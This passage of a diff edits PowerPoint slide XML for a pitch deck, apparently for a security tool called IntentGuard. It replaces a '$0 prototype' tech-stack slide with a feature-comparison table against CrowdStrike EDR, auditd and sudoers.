-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="22C55E"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>✅</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="31" name="TextBox 30"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="2560320"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="32" name="TextBox 31"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="2560320"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Partial</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="33" name="TextBox 32"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="2560320"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="34" name="TextBox 33"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2926079"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>EDR (CrowdStrike)</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="35" name="TextBox 34"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="2926079"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="36" name="TextBox 35"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="2926079"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Partial</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="37" name="TextBox 36"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="2926079"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Partial</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="38" name="TextBox 37"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="2926079"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Partial</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="39" name="TextBox 38"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="2926079"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="40" name="TextBox 39"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="3291839"/>
-            <a:ext cx="1645920" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>auditd</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="41" name="TextBox 40"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2194560" y="3291839"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="42" name="TextBox 41"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3017520" y="3291839"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="43" name="TextBox 42"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4023360" y="3291839"/>
-            <a:ext cx="1005840" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="44" name="TextBox 43"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5029200" y="3291839"/>
-            <a:ext cx="1371600" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="45" name="TextBox 44"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6400800" y="3291839"/>
-            <a:ext cx="822960" cy="256032"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>❌</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -5924,7 +4557,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>TECH STACK — $0 PROTOTYPE</a:t>
+              <a:t>IntentGuard vs. ALTERNATIVES</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5981,8 +4614,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="548640" y="1051560"/>
-            <a:ext cx="8046720" cy="365760"/>
+            <a:off x="548640" y="1097280"/>
+            <a:ext cx="1645920" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5996,16 +4629,14 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
+              <a:defRPr sz="1000" b="1">
                 <a:solidFill>
                   <a:srgbClr val="00D4AA"/>
                 </a:solidFill>
                 <a:latin typeface="Helvetica Neue"/>
               </a:defRPr>
             </a:pPr>
-            <a:r>
-              <a:t>$0 prototype — free-tier Gemini + MongoDB Atlas M0 + open-source</a:t>
-            </a:r>
+            <a:endParaRPr/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -6017,8 +4648,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="1554480"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="2194560" y="1097280"/>
+            <a:ext cx="822960" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6032,15 +4663,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Runtime</a:t>
+              <a:defRPr sz="1000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Intent</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6053,8 +4684,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="1554480"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="3017520" y="1097280"/>
+            <a:ext cx="1005840" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6068,15 +4699,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Java 17, Spring Boot 3.3.5</a:t>
+              <a:defRPr sz="1000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Pre-Exec</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6089,8 +4720,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="1938528"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="4023360" y="1097280"/>
+            <a:ext cx="1005840" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6104,15 +4735,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>LLM</a:t>
+              <a:defRPr sz="1000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Learning</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6125,8 +4756,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="1938528"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="5029200" y="1097280"/>
+            <a:ext cx="1371600" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6140,15 +4771,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Google Gemini 2.5-flash (free tier, 1500 req/day)</a:t>
+              <a:defRPr sz="1000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Explain</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6161,8 +4792,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="2322576"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="6400800" y="1097280"/>
+            <a:ext cx="822960" cy="274320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6176,15 +4807,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Datastore</a:t>
+              <a:defRPr sz="1000" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Agent</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6197,8 +4828,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="2322576"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="548640" y="1463040"/>
+            <a:ext cx="1645920" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6212,15 +4843,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>MongoDB (Atlas M0 free / local)</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>IntentGuard</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6233,8 +4864,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="2706624"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="2194560" y="1463040"/>
+            <a:ext cx="822960" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6248,15 +4879,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Transport</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6269,8 +4900,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="2706624"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="3017520" y="1463040"/>
+            <a:ext cx="1005840" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6284,15 +4915,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Unix Domain Socket (UDS)</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6305,8 +4936,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="3090672"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="4023360" y="1463040"/>
+            <a:ext cx="1005840" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6320,15 +4951,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Testing</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6341,8 +4972,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="3090672"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="5029200" y="1463040"/>
+            <a:ext cx="1371600" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6356,7 +4987,7 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
+              <a:defRPr sz="1000" b="0">
                 <a:solidFill>
                   <a:srgbClr val="B0B0C0"/>
                 </a:solidFill>
@@ -6364,7 +4995,7 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
-              <a:t>jqwik (property-based), JUnit 5</a:t>
+              <a:t>✅ 11 langs</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6377,8 +5008,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="3474720"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="6400800" y="1463040"/>
+            <a:ext cx="822960" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6392,15 +5023,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Languages</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>✅</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6413,8 +5044,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="3474720"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="548640" y="1828800"/>
+            <a:ext cx="1645920" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6428,15 +5059,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>11 Indian languages (Gemini + Bhashini)</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>sudoers</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6449,8 +5080,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="731520" y="3858768"/>
-            <a:ext cx="1645920" cy="274320"/>
+            <a:off x="2194560" y="1828800"/>
+            <a:ext cx="822960" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6464,15 +5095,15 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Speech</a:t>
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF4444"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>❌</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -6485,8 +5116,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2377440" y="3858768"/>
-            <a:ext cx="5943600" cy="274320"/>
+            <a:off x="3017520" y="1828800"/>
+            <a:ext cx="1005840" cy="256032"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -6500,7 +5131,511 @@
           <a:lstStyle/>
           <a:p>
             <a:pPr algn="l">
-              <a:defRPr sz="1200" b="0">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="22C55E"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
